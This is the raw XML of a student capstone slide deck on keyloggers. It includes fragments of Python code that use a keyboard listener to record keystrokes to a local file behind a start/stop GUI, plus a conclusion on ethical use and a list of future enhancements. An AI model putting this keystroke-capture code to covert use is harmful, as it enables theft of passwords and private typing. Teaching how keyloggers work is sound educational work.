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notesSlides/notesSlide15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slides/slide15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slides/slide16.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varScale="1">
        <p:scale>
          <a:sx n="56" d="100"/>
          <a:sy n="56"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0"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1"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4/4/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:latin typeface="Calibri" pitchFamily="0" charset="0"/>
              <a:ea typeface="等线" pitchFamily="0" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12"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3"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4"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3666692"/>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17842246"/>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07778722"/>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9144498"/>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36043114"/>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30872114"/>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37121866"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide1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81650466"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide1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14774816"/>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74375525"/>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23405483"/>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145673"/>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81469863"/>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19744092"/>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46125904"/>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02804778"/>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42334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showMasterSp="0" type="title" preserve="1">
  <p:cSld name="标题幻灯片">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5"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24"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23"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22"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16" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="446534" y="3085764"/>
            <a:ext cx="11298933" cy="3338149"/>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17" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581191" y="1020431"/>
            <a:ext cx="10993550" cy="147501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pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581194" y="2495445"/>
            <a:ext cx="10993546" cy="59032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pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19"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4/4/2024</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
        <p:nvSpPr>
          <p:cNvPr id="20"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21"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495122858"/>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84330233"/>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5759707"/>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5"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34"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33"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32"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29" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581192" y="702155"/>
            <a:ext cx="11029616" cy="53029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0" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581192" y="1302026"/>
            <a:ext cx="11029615" cy="46733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1"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4/4/2024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625091341"/>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78"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77"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76"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75"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71" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="575894" y="729658"/>
            <a:ext cx="11029616" cy="59224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72"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4/4/2024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73"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endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74"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795196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23201024"/>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17526275"/>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00907148"/>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68853549"/>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51085289"/>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89645449"/>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4176485"/>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83407779"/>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581192" y="705124"/>
            <a:ext cx="11029616" cy="557146"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b"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581192" y="1415198"/>
            <a:ext cx="11029616" cy="457285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4/4/2024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 name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4"/>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6" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="446534" y="457200"/>
            <a:ext cx="3703319" cy="94997"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="465359"/>
          </a:solidFill>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8042147" y="453643"/>
            <a:ext cx="3703319" cy="98554"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>
          </a:solidFill>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4241830" y="457200"/>
            <a:ext cx="3703319" cy="91440"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10485002" y="6437910"/>
            <a:ext cx="1125804" cy="365126"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1822822966"/>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pitchFamily="0" charset="0"/>
          <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
          <a:cs typeface="Franklin Gothic Demi" pitchFamily="0"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pitchFamily="0" charset="0"/>
          <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
          <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="629920"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pitchFamily="0" charset="0"/>
          <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
          <a:cs typeface="Franklin Gothic Book" pitchFamily="0"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pitchFamily="0" charset="0"/>
          <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
          <a:cs typeface="Franklin Gothic Book" pitchFamily="0"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4.pn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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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hyperlink" Target="https://github.com/techtrainer20/TNSDC" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.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2.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.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slideLayout" Target="../slideLayouts/slideLayout1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 name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1359107" y="1821635"/>
            <a:ext cx="9144000" cy="977778"/>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3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyloggers</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="-329782" y="1034320"/>
            <a:ext cx="1272664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pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CAPSTONE PROJECT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="1481AC"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3117529" y="4586365"/>
            <a:ext cx="7980183" cy="681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Presented By:</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1.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Akash R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Dmi</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College of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Engineering-IT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="1481AC"/>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628139085"/>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7"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58" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="296711" y="-427071"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>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
        <p:nvSpPr>
          <p:cNvPr id="59" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="480131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Define the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start_keylogger</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function</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def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start_keylogger</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global listener</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listener =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keyboard.Listener</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on_press</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on_press</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on_release</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on_release</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listener.start</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label.config</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(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")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start_button.config</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(state='disabled')</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stop_button.config</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(state='normal')</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Define the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stop_keylogger</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function</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def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stop_keylogger</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global listener</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listener.stop</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label.config</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(text="Keylogger stopped.")</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start_button</a:t>
            </a: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897821954"/>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Result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pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1384726" y="1719024"/>
            <a:ext cx="2991267" cy="3419952"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201765746"/>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2"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Result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pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="904352" y="1692539"/>
            <a:ext cx="7487694" cy="752580"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="720801" y="3458123"/>
            <a:ext cx="11250407" cy="1563407"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333630300"/>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5"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Conclusion</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66" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="901232" y="0"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>The keylogger program is a powerful tool that can be used to monitor and record keystrokes on a computer system. The program can be used for both legitimate and malicious purposes, and it is important to ensure that it is used ethically and legally. The program can be used to monitor employee activity, detect malicious software, and assist in troubleshooting technical issues. However, it is crucial to ensure that the use of the program respects the privacy and security of the users.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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855557355"/>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7"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700" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>There are several ways in which the keylogger program can be improved and enhanced in the future. Here are some possible ideas:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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Tx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Real-time monitoring: The program can be enhanced to provide real-time monitoring of keystrokes. This can be useful for detecting and preventing malicious activities in real-time.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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Tx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Filtering of specific keywords: The program can be enhanced to filter specific keywords and provide alerts when those keywords are detected. This can be useful for detecting and preventing unauthorized access to sensitive information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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Tx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Integration with other security tools: The program can be integrated with other security tools, such as firewalls and intrusion detection systems, to provide a more comprehensive security solution.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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Tx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Cross-platform compatibility: The program can be enhanced to support cross-platform compatibility, allowing it to be used on different operating systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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Tx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Improved user interface: The program can be enhanced to provide a more user-friendly interface, making it easier for users to navigate and use the program.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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
        <p:nvSpPr>
          <p:cNvPr id="68" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="535670" y="844659"/>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华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Future scope</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3300" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>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048832563"/>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9"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References</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70"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404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>2.https://www.bing.com/ck/a?!&amp;&amp;p=1f4ad54fbd8b6758JmltdHM9MTcxMTg0MzIwMCZpZ3VpZD0wY2FkZjU2My03YjRjLTZiMTctMzU4Ny1lNmJmN2E5ZTZhOTcmaW5zaWQ9NTUyOA&amp;ptn=3&amp;ver=2&amp;hsh=3&amp;fclid=0cadf563-7b4c-6b17-3587-e6bf7a9e6a97&amp;psq=keyloggrs&amp;u=a1aHR0cHM6Ly93d3cuZ2Vla3Nmb3JnZWVrcy5vcmcvaW50cm9kdWN0aW9uLXRvLWtleWxvZ2dlcnMv&amp;ntb=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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351229349"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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9" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1463041" y="2766217"/>
            <a:ext cx="9298745"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112435034"/>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6" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="849573" y="558468"/>
            <a:ext cx="10515600"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OUTLINE</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
        <p:nvSpPr>
          <p:cNvPr id="37" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="586490" y="1618937"/>
            <a:ext cx="11019020" cy="52390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Problem Statement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Proposed System/Solution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Calibri" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>System </a:t>
            </a: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Development Approach</a:t>
            </a:r>
            <a:r>
